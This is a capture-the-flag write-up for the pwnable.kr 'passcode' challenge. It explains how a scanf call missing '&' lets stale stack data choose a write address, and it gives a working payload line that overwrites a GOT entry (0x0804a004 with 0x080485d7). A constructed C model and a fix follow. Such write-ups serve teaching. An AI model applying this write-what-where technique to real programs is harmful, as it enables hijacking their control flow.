# 05 - passcode

## The Challenge

Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that?

ssh passcode@pwnable.kr -p2222 (pw:guest)

## Examining the Code

The main function calls **welcome** and then **login**, one directly after the other.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFviGdBJyxolO32yPWZ%2Fimage.png?alt=media\&token=82e394a0-779a-4474-bc47-84b26cee1f62)

#### Welcome

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFviUc1lmL6d9Fc7EaM%2Fimage.png?alt=media\&token=07e01b27-1193-4c2f-99ca-8fb25718917f)

It reads a string of up to 100 characters into a local buffer, prints it, and then returns. This buffer cannot be overflowed, but the data it leaves on the stack may be useful later.

#### Login

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvj4WQu8l5pslxjB6M%2Fimage.png?alt=media\&token=68660105-066f-450f-b056-5f2c6d2b2ff2)

It seems we need to make passcode1 and passcode2 equal to 338150 and 13371337, but a closer look shows that we can't write input into these variables at all, because scanf is misused. Both scanf calls are missing the **&** before the variable, so scanf receives the variable's current (uninitialised) value as the destination pointer: our input is written to whatever address that value happens to hold, not into the variable itself.

## Executing the Binary

**First execution - passcode1 is a number**

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvn-PuvMSHIjOLoIWI%2Fimage.png?alt=media\&token=80902ee9-0c00-43e6-a03b-78fe828b7ed4)

**Second execution - passcode1 is a string**

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvn72ec7QDVEIxWVgK%2Fimage.png?alt=media\&token=0bc47b91-a453-4818-a64d-3627bc193e7d)

It seems the program is not interacting properly with regular input. What's going on?

Let's debug this thing.

## Debugging

We'll examine the stack at the beginning of **login** after entering the longest allowed input, made entirely of 'a' characters.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvozq5PP2AJyDHWFzL%2Fimage.png?alt=media\&token=410d9448-b091-418b-9bb7-cb8fc651f868)

Some of the input made its way here. Does this help us? Look closely:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvp_zEFdWBawMv8iM0%2Fimage.png?alt=media\&token=af65eb90-29e8-450e-8908-bd74fe85ab3c)

This is the location of passcode1. What do we find there?

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvqrIjFUnwf-K2luw8%2Fimage.png?alt=media\&token=c2500498-bcac-44b6-87ff-e9277e5093d4)

The last four bytes of our input! So, we can control the value of passcode1. What can be done with it?

If you recall the examination of the code, the value requested from the user will be written to the location pointed to by passcode1. Where should we make it point?

## The GOT Table

***TODO***

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MFvhMifaIBRjO64qVgo%2F-MFvsVRj1MZom0BwHVGH%2Fimage.png?alt=media\&token=cf958d21-cdf7-4435-af2c-a2abc345e550)

The final run, typed at the gdb prompt (`r` with bash process substitution feeding stdin): 96 filler bytes plus the little-endian address 0x0804a004 fill welcome's 100-byte buffer, the newline ends that read, and 134514135 (0x080485d7) is the decimal value that login's `scanf("%d")` then writes to that address.

```
r < <(python3 -c "import sys; sys.stdout.buffer.write(b'\x41' * 96 + b'\x04\xa0\x04\x08\n' + b'134514135')")
```
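The missing `&` and the stale stack data found in the debugger, modelled as an added C example (constructed here, not code from the challenge binary or this writeup): `welcome_sim`, `login_sim_pointer`, `login_sim_value`, `read_passcode_fixed` and `payload_target` are hypothetical names, and the 96-byte offset of passcode1 inside welcome's old buffer is assumed from the debugger screenshots.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the bug, not the challenge binary: welcome()'s 100-byte
 * name buffer and login()'s uninitialised passcode1 share stack memory, with
 * passcode1 at offset 96 of the old buffer (offset assumed from the debugger). */
#define NAME_LEN   100
#define PC1_OFFSET 96
static unsigned char stack_region[NAME_LEN];   /* memory both frames reuse */
/* welcome(): scanf("%100s", name) copies input until whitespace or 100 bytes. */
static void welcome_sim(const char *input) {
    size_t n = 0;
    memset(stack_region, 0, sizeof stack_region);
    while (n < NAME_LEN && input[n] != '\0' && !isspace((unsigned char)input[n]))
        n++;
    memcpy(stack_region, input, n);
}

/* login(): int passcode1; scanf("%d", passcode1);   <- missing '&'.
 * The stale int is read as a little-endian x86 pointer and scanf would write
 * through it; the model returns the pointer instead of performing the write. */
static uint32_t login_sim_pointer(void) {
    const unsigned char *b = stack_region + PC1_OFFSET;
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* What "%d" parses from the next input line is the value stored there. */
static long login_sim_value(const char *next_line) { return strtol(next_line, NULL, 10); }
/* Corrected read: '&' makes scanf write into passcode1 itself, and the return
 * value is checked so bad input cannot leave the variable uninitialised. */
static int read_passcode_fixed(const char *line, int *passcode1) {
    return sscanf(line, "%d", passcode1) == 1;
}

/* Feed the page's first input line (96 x 'A' + 04 a0 04 08) through the model. */
static uint32_t payload_target(void) {
    static const unsigned char addr_le[4] = {0x04, 0xa0, 0x04, 0x08};
    char line1[NAME_LEN];
    memset(line1, 'A', PC1_OFFSET);
    memcpy(line1 + PC1_OFFSET, addr_le, sizeof addr_le);
    welcome_sim(line1);
    return login_sim_pointer();
}

int main(void) {
    printf("stale pointer 0x%08x, value written there 0x%08lx\n",
           (unsigned)payload_target(), login_sim_value("134514135"));
    return 0;
}
```

Compiling the real code with `-Wall` already reports the `%d` / `int` mismatch; treating format warnings as errors (`-Werror=format`) is what turns the "who cares" warning into a build failure.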
